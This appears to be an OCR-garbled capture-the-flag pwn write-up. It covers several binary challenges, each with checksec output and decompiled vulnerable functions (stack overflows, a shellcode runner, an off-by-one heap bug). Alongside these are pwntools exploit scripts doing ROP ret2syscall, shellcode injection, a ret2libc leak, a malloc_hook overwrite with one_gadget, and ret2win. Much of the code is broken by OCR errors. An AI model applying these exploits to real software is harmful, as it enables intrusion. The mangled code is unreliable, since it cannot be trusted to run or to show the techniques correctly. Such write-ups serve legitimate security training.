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wuangwuang@wuangwuang-PC: ~/Desktop$ checksec - ./51

RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIF
¥ Fortified Fortifiable FILE

Partial RELRO No canary found NX enabled No PIE No RPATH  No RUNPATH 2237 Symbols Yes 2
41 ./51

int v4; // [esp+1Ch] [ebp-14h] BYREF

puts("ROP is easy is'nt it ?");
printf("Your input :");
fflush(stdout);

return read(@, &v4, 100);
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stack 20

esp

ecx

ebp

exffffbd3e
@xTfffbd34
@xffffbd3s
@xTfffbd3c
exffffbd4e
@xTTTTbd44
@xffffbd4s
@xTTfTbd4c
exffffbd5e
@xTfffbd54
@xffffbd58
@xfTfffbd5c
exffffbd6e
@xTfffbd64
+ 4]

@xTfffbd6s
exffffbdéc
exftfffbd70
@xffffbd74
@xftfffbd78
@xftfffbd7c

2xe@

@xffffbd4c «— @xa3l /*
'd' *‘,

ox64 /*

AYE

*/

@x80495d2 (_ libc_csu_init+13@) «— . 1

2x1

@xffffbdf4 — @xffffbfas
@xffffbdfc — @xffffbfc2
"1\n" */f
exit_funcs)
@xffffbdf4 — @xffffbfas
@xffffbdfc — @xffffbfc2

@xa3l /*
@x80ead74

Px80481a8
Ax@
@xBdealddC

@x80495T0
@x80@49@3a
Bx1

(

(_init) =

' fhome fwuangwuang/Desktop/51"'
'SHELL=/bin/bash’

@x80eb2a@ (initial) =— @x@
' fhome fwuangwuang/Desktop/51"'
'SHELL=/bin/bash’

(_GLOBAL_OFFSET_TABLE_+12) —+ @x80677d@ (__stpcpy_sse2) =—

(__libc_csu_fini) -—
(__libc_start_main+458) =— [ 1.

@xffffbdf4 — @xffffbfaé +— '/home/wuangwuang/Desktop/51'
exffffbdfc — @xffffbfc2 -

axe

wuangwuang@wuangwuang-PC: ~/Desktop$ ROPgadget
Gadgets information

'SHELL=/bin/bash'

--bipary ./51 --only "int"

2x@80493el

Unique gadgets found: 1

ret2syscall.

exp

: int @x8@
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from pwn import

context(arch ,log level

remote( , 28515)

0x80493el

0x080baeb6

0x0806e850
read_addr 0x0806CD50
bss_addr OX80EBF79

32 p32(read_addr)
p32(pop_dcb) p32(9) p32(bin_sh) p32(0x8)
p32(pop_eax) p32(0xb)
p32(pop_dcb) p32(9) p32(9) p32(bin_sh)
p32(int_addr)

.recvuntil(

.sendline(payload)

.sendline(
.interactive()
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int __cdecl main(int argc, const char **argv, const char **envp)
{
orw_seccomp();
printf("Give my your shellcode:");
read(@, &shellcode, exC8u);
((void (*)(void))shellcode)();
return @;
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unsigned int orw_seccomp()

{
__int16 v1; // [esp+4h] [ebp-84h] BYREF
char *v2; // [esp+8h] [ebp-86h]
char v3[96]; // [esp+Ch] [ebp-7Ch] BYREF
unsigned int v4; // [esp+6Ch] [ebp-1Ch]
v4d = _ _readgsdword(@xl4u);
gmemcpy(v3, &unk_804864@8, sizeof(v3));
vl = 12;
v2 = v3;

prctl(38, 1, e, @, 8);
prctl(22, 2, &vl);
return __readgsdword(@exl4u) "~ v4;

}
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from pwn import

context(os , arch , log level
r remote( , 27008)

shellcode asm(

shellcode+=asm(

shellcode+=asm(

r.sendlineafter( , shellcode)

r.interactive()
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ssize_t vulnerable_function()

{
char buf[136]; // [esp+@h] [ebp-88h] BYREF

printf("What's this:%p?\n", buf);
return read(@, buf, 256u);
}
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from pwn import

context(arch ,log_level

process(

(r.recv(8), 16)
(buf_addr)

shellcode asm(shellcraft.sh())

shellcode (ox88 + Ox4 (shellcode)) p32(buf_addr)




from pwn import

context(arch ,log level

process(
ELF(
el f=ELF(

main_addr=0x80484b7
write plt=elf.plt[
write got=elf.got|

payload (ox88 ox4 ) p32(write plt) p32(main_addr) +p32(0x1)+p32(write_got)+p32(0x4)

r.send(payload)
write_addr u3d2(r.recv(4))

libc_base=write_addr-1libc.sym[
system_addr=1ibc_base+libc.sym[ ]
bin_sh=1ibc_base+libc.search( ). @)

payload (0x88 + 0x4) p32(system_addr) p32(main_addr)+ p32(bin_sh)

r.send(payload)

r.interactive()
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create

[ Int64 create()

{
__int64 result; // rax
int i; // [rsp+4h] [rbp-1Ch]
unsigned int v2; // [rsp+8h] [rbp-18h]
int v3; // [rsp+8h] [rbp-18h]
void *v4; // [rsp+1eh] [rbp-18h]
result = 6LL;
for (1 =9; 1 <= 15; ++1i )
{
result = *((unsigned int *)&unk_202040 + 4 * 1);
if ( !(_DWORD)result )
{
printf(“size: ");
v3 = sub_BE@(v2);
if (v >0)
{
if ( v3 > 4896 )
V3 = 4896;
v4 = calloc(v3, 1luLlL);
if (lva )
exit(-1);
*((_DWORD *)&unk_202040 + 4 * i) = 1;
*((_DWORD *)&unk_202044 + 4 * 1) = v3;
gword_202048[2 * 1] = v4;
printf(“"the index of ticket is %d \n", (unsigned int)i);
¥
return (unsigned int)i;
¥
¥
return result;
L_inte4 __ fastcall sub_BE@(int al)
i
__int64 result; // rax
int v2[3]; // [rsp+Ch] [rbp-14h] BYREF
unsigned __int64 v3; // [rsp+18h] [rbp-
v2[@] = al;
v3 = _ readfsqword(@x28u);
v2[2] = _isoc99_scanf("%d", v2);
if ( v2[@] <= 256 && v2[@] >= @ )
result = (unsigned int)v2[e];
else
result = 18LL;
1 return result;
}
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*(&unk_2e2e4e + 4 * 1) = 1;

*(&unk_202844 + 4 * 1) = v3;
eI,

cage

shl rax, 4

mov rdx, rax

lea rax, unk_202040

mov dword ptr [rdx+rax], 1

mov eax, [rbp+var_1C]

cdqge

shl rax, 4

mov rcx, rax

lea rax, unk_202044

mov edx, [rbp+var_18]

mov [rcx+rax], edx

mov eax. [rbo+var 1C1
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write

int v1; // [rsp+Ch] [rbp-14h]
int v2; // [rsp+Ch] [rbp-14h]
int v3; // [rsp+1@h] [rbp-1@h]
unsigned int v4; // [rsp+14h] [rbp-Ch]

printf("index: ");
v2 = sub_BEe(vl);

v3 = v2;
if ( v2 >= @ && v2 <= 15 )
{
v *((_DWORD *)&unk_202040 + 4 * v2);

P
f(v2==1)

printf(“size: ");
v2 = sub_BEe(1);
v4d = sub_E26(*((unsigned int *)&unk_282044 + 4 * v2), (unsigned int)v2);
if (v2 >0)
{
printf("content: ");
v2 = sub_D92(qword_202048[2 * v3], v4);
¥

¥
¥

return (unsigned int)v2;

|_inté4 _ fastcall sub_E26(int al, u
{

__int64 result; // rax

if ( a1l » (int)a2 )
return az;
if ( a2 - al == 18 )
LODWORD(result) = al + 1;
else
LODWORD(result) = al;
return (unsigned int)result;

XA 7 U R R TS RN RT T K10t 2 2 5 — A7, il off
by oneiw i .



drop

| _inté4 drop()

{
int v@; // eax
int v2; // [rsp+Ch] [rbp-14h]
int v3; // [rsp+1@h] [rbp-10h]
__inte4 v4; // [rsp+l1leh] [rbp-1eh]
printf("index: ");
v@ = sub_BE@(v3);
vd = vB;
v2 = ve;
if ( ve »>= OLL && ve <= 15LL )
{
vd = *((int *)&unk_202048 + 4 * vB);
if ((vd ==1)
{
*((_DWORD *)&unk_282040 + 4 * v@) = @;
*((_DWORD *)&unk_202044 + 4 * v0) = @;
free((void *)qword_202048[2 * vB]);
qword_202048[2 * v2] = OLL;
}
}
return vi;
show
|_int64 show()
{
int v1; // [rsp+6h] [rbp-16h]
int v2; // [rsp+eh] [rbp-1@h]
int v3; // [rsp+4h] [rbp-Ch]
printf("index: ");
v2 = sub_BE@(vl);
v3 = v2;
if (v2 >= @ & & v2 <= 15 )
{
v2 = *((_DWORD *)&unk_202040 + 4 * v2);
if (v2==1)
{
printf("content: ");
v2 = sub_1@8E(qword_202848[2 * v3], *((unsigned int *)&unk_202044 + 4 * v3));
¥
¥
return (unsigned int)v2;
¥
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from pwn import

context(arch ,log level

remote( , 27844)

.recvuntil(
.sendline(
.recvuntil(
.sendline(

.recvuntil(

def write(index, size, content):

r.recvuntil( )
.sendline(
.recvuntil( )
.sendline( (index))
.recvuntil( )
.sendline( (size))
.recvuntil(

.sendline(content)

def drop(index):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (index))

def show(index):
.recvuntil(
.sendline(
.recvuntil( )
.sendline( (index))

one_gadget ox4527a

write(@, 0x18 + 10, payload)
drop(1)
create(0x60)

show(2)

main_arena=u64(r.recvuntil( )[-6:].1just(8,

libc_base=main_arena-0x3c4b20
one_gadget libc_base one_gadget
malloc_hook libc_base+libc.symbols|
realloc libc_base+libc.symbols|




p64(malloc_hook - ©x23)
, 8, payload)

oxb p64(one_gadget) p64(realloc 13)

.recvuntil(
.sendline(
.recvuntil( )
.sendline( (0x20))

.interactive()
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int vuln()

char s[168]; // [esp+Ch] [ebp-6Ch] BYREF

gets(s);
return puts(s);

}

TR



char *_ cdecl win(int al, int a2)
{
char *result; // eax
char s[64]; // [esp+Ch] [ebp-4Ch] BYREF
FILE *stream; // [esp+4Ch] [ebp-Ch]

stream = fopen("flag.txt", "r");
if ( !stream )
{
puts(
"Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.");
exit(e);

result = fgets(s, 64, stream);

if ( al == -559038737 && =22 == -559038242 )
result = (char *)printf(s);

return result;
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exp

from pwn import

context(arch ,log level

remote( , 26240)

0x80485ch
0x70 + p32(win_addr) p32(OxODEADBEEF) + p32(@x0DEADCODE)
r.sendline(payload)

r.interactive()
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